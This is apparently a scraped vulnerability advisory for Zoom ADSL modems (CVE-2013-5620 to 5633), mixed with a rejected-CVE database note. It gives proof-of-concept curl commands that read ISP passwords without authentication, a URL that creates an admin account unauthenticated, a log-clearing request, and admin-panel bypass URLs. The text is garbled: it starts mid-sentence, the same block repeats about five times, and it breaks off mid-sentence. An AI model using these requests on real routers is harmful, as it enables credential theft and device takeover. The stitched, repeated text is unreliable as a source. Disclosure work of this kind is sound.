preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP 